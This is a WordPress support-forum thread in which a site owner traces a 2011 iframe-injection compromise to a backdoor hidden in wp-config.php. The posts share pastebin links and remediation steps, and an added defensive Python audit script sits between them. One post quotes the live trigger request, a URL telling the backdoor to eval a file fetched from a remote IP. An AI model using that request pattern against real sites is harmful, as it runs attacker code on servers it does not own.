afelotreyu
Forum Replies Created
Forum: Fixing WordPress
In reply to: My website is Infected with Mass Iframe Injection Attack 2
Yes MickeyRoush, it seems in my case I was attacked back in August by the timthumb issue and the attacker left a back door on one of the WordPress installs, which allowed him to execute that new iframe attack last week.
Anyways, everything else seems fine so far, I am still working on database password changes and stuff like that. Better be safe than sorry.
Good luck to everyone!
Forum: Fixing WordPress
In reply to: My website is Infected with Mass Iframe Injection Attack 2
Scott, I did the same in all my installs of WordPress, but the one with the actual problem had the issue hidden in the wp-config.php file. As I mentioned in my last post, that file was the one allowing the “attackers” to break all other installs of WordPress, and no matter how many times I updated and reinstalled WordPress on it, the issue was still there. I have to manually fix the problem with wp-config.php.
To be safe, I would suggest you check all your installs and make sure the wp-config.php file is not infected. If you have a wp-config file with more than 100 lines you may have a problem.
Again, the infected file has about 4000 lines and somewhere in line 2090 is where I found the pingnow function.
One thing I noticed about the wp-config file was that the “salt keys” were the same as the wp-config-sample.php.
Just be really careful modifying that file and good luck!
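The checks suggested in the post above (a wp-config.php of more than 100 lines, salts identical to wp-config-sample.php, a reference to pingnow), sketched as a read-only audit script. This is an added example, not code from the thread; the function names, the blank-line heuristic and the sample strings are assumptions made here.

```python
import re
import sys
from pathlib import Path

MAX_LINES = 100  # rule of thumb from the post: a normal wp-config.php is shorter
SAMPLE_SALT = "put your unique phrase here"  # placeholder shipped in wp-config-sample.php
MARKERS = [re.compile(r"pingnow", re.I)]  # parameter name reported in the thread

def audit_config_text(text):
    """Return findings for the contents of one wp-config.php (empty list = clean)."""
    findings = []
    lines = text.splitlines()
    if len(lines) > MAX_LINES:
        findings.append(f"line-count:{len(lines)}")
        # Assumed extra heuristic: padding with blank lines to hide injected code.
        blank = sum(1 for ln in lines if not ln.strip())
        if blank * 2 > len(lines):
            findings.append(f"mostly-blank:{blank}")
    if SAMPLE_SALT in text:
        findings.append("placeholder-salts")
    for number, ln in enumerate(lines, 1):
        if any(m.search(ln) for m in MARKERS):
            findings.append(f"marker-line:{number}")
    return findings

def audit_tree(root):
    """Read (never modify) every wp-config.php below root; return {path: findings}."""
    report = {}
    for path in Path(root).rglob("wp-config.php"):
        found = audit_config_text(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report

# Constructed samples, not taken from the thread's pastes.
CLEAN = "<?php\ndefine('DB_NAME', 'wp');\ndefine('AUTH_KEY', 'constructed-unique-value');\n"
SUSPECT = ("<?php\ndefine('AUTH_KEY', 'put your unique phrase here');\n"
           + "\n" * 2000
           + "// harmless stand-in for a line mentioning pingnow\n"
           + "\n" * 2000)

if __name__ == "__main__":
    for cfg, hits in audit_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(cfg, ", ".join(hits))
```

Run it against the directory that holds all the installs; a hit is a reason to open the file and read it by hand, not proof of compromise.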
Forum: Fixing WordPress
In reply to: My website is Infected with Mass Iframe Injection Attack 2
ARG I hate my day right now.. Sorry to the Owner of this post if I may be taking over your original post.
Anyways, I found where “pingnow” is. It seems the install of WordPress was compromised back in August, which caused the wp-config.php file to be modified, leaving a “backdoor”.
I found the wp-config.php contained a copy of the “wp-config-sample.php” plus 40000 lines of code from which most were blank and somewhere in the middle of the file I found this:
https://pastebin.com/h9zXeFN6
Long story, no matter how many times I removed the code from my wp-settings.php, if the permissions are not corrected as well, every time someone requested https://blabla.domain/?pingnow=eval&file=https://91.196.216.20/99.php&pass=33e75ff09dd601bbe69f351039152189 all the wp-settings.php for all other installs get modified.
For those of you having these problems, check “ALL” of your WordPress installs, review the wp-config.php file and make sure you modify the permissions to write on wp-config.php and wp-settings.php.
Hope that helps, I am now really tired
Forum: Fixing WordPress
In reply to: My website is Infected with Mass Iframe Injection Attack 2
WordPress Support people, I hope you can find the answer or vulnerability in this post.
What seems to have happened is that one of my wordpress installs was compromised, from where the attacker modified all wp-settings.php files.
Here is the log of the “attack”
https://pastebin.com/dJVztNJ7
From which I got the following files:
pp.txt
just contains an echo
echo'test'
tt.txt
https://pastebin.com/gcX19qe2
tt.php
https://pastebin.com/3vXsNLNL
and 99.php or 999.php is
https://pastebin.com/K3yuH2z7
This last file is what causes the overwrite of all wp-settings.php
Also, to add to the odd stuff I found a file named upd.php in wp-content. The file contained this:
https://pastebin.com/1y92Jf0C
Again, if I can find any more information I will post
Forum: Fixing WordPress
In reply to: My website is Infected with Mass Iframe Injection Attack 2
Could someone please tell me what the “/?pingnow=eval” call does?
I think I found the source of the problem, and how other wordpress are affected, I have the files and will be linking soon, just need to understand what pingnow=eval does.
Forum: Fixing WordPress
In reply to: My website is Infected with Mass Iframe Injection Attack 2
Sorry Scott, I am actually just starting to get involved with WordPress and I am not 100% familiar with all the steps to secure a WordPress install, hopefully someone else can help.
At this point I have modified the permissions on wp-settings.php to only read, that should stop attackers from adding funny functions to my WP but will also stop my WordPress from executing proper updates when run via the Dashboard.
Again, I still need to figure out how they got in and modified my wp-settings in the first place.
A
Forum: Fixing WordPress
In reply to: My website is Infected with Mass Iframe Injection Attack 2
Sorry Mod, did not see the rules, here is the link:
https://pastebin.com/YV38tGHE
Forum: Fixing WordPress
In reply to: My website is Infected with Mass Iframe Injection Attack 2
UPDATE!
My wp-settings.php was compromised with the following function
https://pastebin.com/YV38tGHE
After a little digging I found the sys_get_temp_dir()= /tmp for me, was storing the file wp_inc which of course contained the bad <script> code.
Hope that helps some of you, I still need to figure out how they got in.
A
Forum: Fixing WordPress
In reply to: My website is Infected with Mass Iframe Injection Attack 2
Hey Scott,
so to my giant surprise I also had this on my web page. Seems the attack was from yesterday, Nov 3, 2011. I couldn’t really find how they dumped the code in it. But the page that nsathees reported the following code:
[Code moderated as per the Forum Rules. Please use the pastebin]
At this point, I gave up trying to find it. So I logged in to the admin side directly and did a reinstall of WordPress via the dashboard. Now the page is clean.
The question now is, how did they get in?
A